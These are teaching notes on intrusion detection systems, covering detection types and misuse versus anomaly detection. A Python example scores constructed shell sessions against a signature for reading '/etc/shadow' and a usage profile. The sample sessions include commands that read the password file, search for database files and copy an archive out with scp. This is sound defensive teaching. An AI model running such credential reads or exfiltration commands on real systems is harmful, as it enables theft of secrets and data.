Definitions
- Intrusion: any set of activities that attempt to compromise the integrity, confidentiality or availability of a resource.
- Examples:
  - DoS: an attempt to starve a host of the resources it needs to function correctly.
  - Compromise: obtaining privileged access to a host by exploiting known vulnerabilities.
- Intrusion Detection: the process of identifying and responding to intrusion activities.
Elements of ID
- Primary assumptions:
  - system activities are observable
  - normal and intrusive activities leave distinct evidence
Components of IDS
- From an algorithmic perspective:
  - features: capture evidence of intrusions
  - models: piece the evidence together
- From a system architecture perspective:
  - various components: audit data processor, knowledge base, decision engine, alarm generation and responses.
IDS Classification
- Source
  - Host-based: detects and examines malicious activity on individual hosts; optimized for monitoring a single host; monitors system and network activity on that host (e.g. file systems, log files, user actions); the findings of several host-based intrusion detection systems can be integrated to provide a unified view of multiple hosts.
  - Network-based: deploys sensors at strategic locations (e.g. packet sniffing via tcpdump at routers); inspects network traffic (watching for protocol violations and unusual connection patterns); monitors user activities (looking into the data portions of packets for malicious command sequences).
Detection Mechanisms
- Misuse Detection: looks for known attack signatures in the user's behavior; higher accuracy, since it distinguishes normal from intrusive activity by explicit rules; cannot detect new attacks.
- Anomaly Detection: statistically analyzes the user's current sessions, compares them to a profile describing the user's normal behavior, and reports significant deviations to the security officer; can detect new attacks.
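As an added example (not part of the notes above), the two mechanisms side by side in Python, run over a constructed audit trail of shell commands: the misuse detector matches a small signature knowledge base, while the anomaly detector builds a command-frequency profile from past sessions and reports a session whose distribution deviates from it. The sessions, the signature, the L1-distance score and the 0.8 threshold are all constructed here for illustration.

```python
import re
from collections import Counter

# Constructed audit trail (hypothetical): one list of shell commands per past session
# of the same user. These sessions define the user's "normal" profile.
BASELINE_SESSIONS = [
    ["ls -la", "cd src", "vim main.c", "make", "ls", "git commit -am wip", "make"],
    ["cd src", "ls", "git pull", "vim util.c", "make", "git push"],
    ["ls", "vim main.c", "make", "make test", "git diff", "ls src", "cd .."],
]
# A session matching a known signature, and one with activity no signature covers.
KNOWN_ATTACK_SESSION = ["ls", "cat /etc/shadow"]
SUSPECT_SESSION = ["ls", "whoami", "id", "find /home -name '*.db'", "find /home -name '*.bak'",
                   "tar czf dump.tgz /home/data", "scp dump.tgz ext:", "scp notes.tgz ext:"]

# Misuse detection: a knowledge base of attack signatures (constructed example).
SIGNATURES = {
    "shadow_file_read": re.compile(r"^cat\s+/etc/shadow$"),
}

def misuse_detect(session):
    """Names of signatures matched by any command in the session; [] for unknown attacks."""
    return [name for cmd in session
            for name, pat in SIGNATURES.items() if pat.search(cmd)]

def build_profile(sessions):
    """Relative frequency of each command name (first token) over the baseline sessions."""
    counts = Counter(cmd.split()[0] for s in sessions for cmd in s)
    total = sum(counts.values())
    return {name: n / total for name, n in counts.items()}

def anomaly_score(profile, session):
    """L1 distance between the session's command distribution and the profile (0 to 2)."""
    counts = Counter(cmd.split()[0] for cmd in session)
    observed = {name: n / len(session) for name, n in counts.items()}
    return sum(abs(profile.get(k, 0.0) - observed.get(k, 0.0))
               for k in set(profile) | set(observed))

def anomaly_detect(profile, session, threshold=0.8):
    """(flagged, score, command names never seen in the profile); threshold is arbitrary."""
    score = anomaly_score(profile, session)
    novel = sorted({cmd.split()[0] for cmd in session} - set(profile))
    return score > threshold, round(score, 3), novel

if __name__ == "__main__":
    profile = build_profile(BASELINE_SESSIONS)
    print("misuse, known attack:", misuse_detect(KNOWN_ATTACK_SESSION))
    print("misuse, suspect session:", misuse_detect(SUSPECT_SESSION))  # [] -> missed
    print("anomaly, suspect session:", anomaly_detect(profile, SUSPECT_SESSION))
```

The suspect session passes the signature check untouched but scores 1.75 against the profile, with every command except ls unseen in the baseline; a real deployment would tune the threshold against ordinary sessions to control false alarms.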
Challenges of IDSs
- runtime limitations
- specification of detection signatures
- dependency on environment
Potential Solutions
- Data mining: e.g. sequential pattern mining and episode rules
- Machine learning techniques: supervised learning and unsupervised learning
- Co-simulation mechanism: combining the misuse and anomaly techniques through a co-simulation mechanism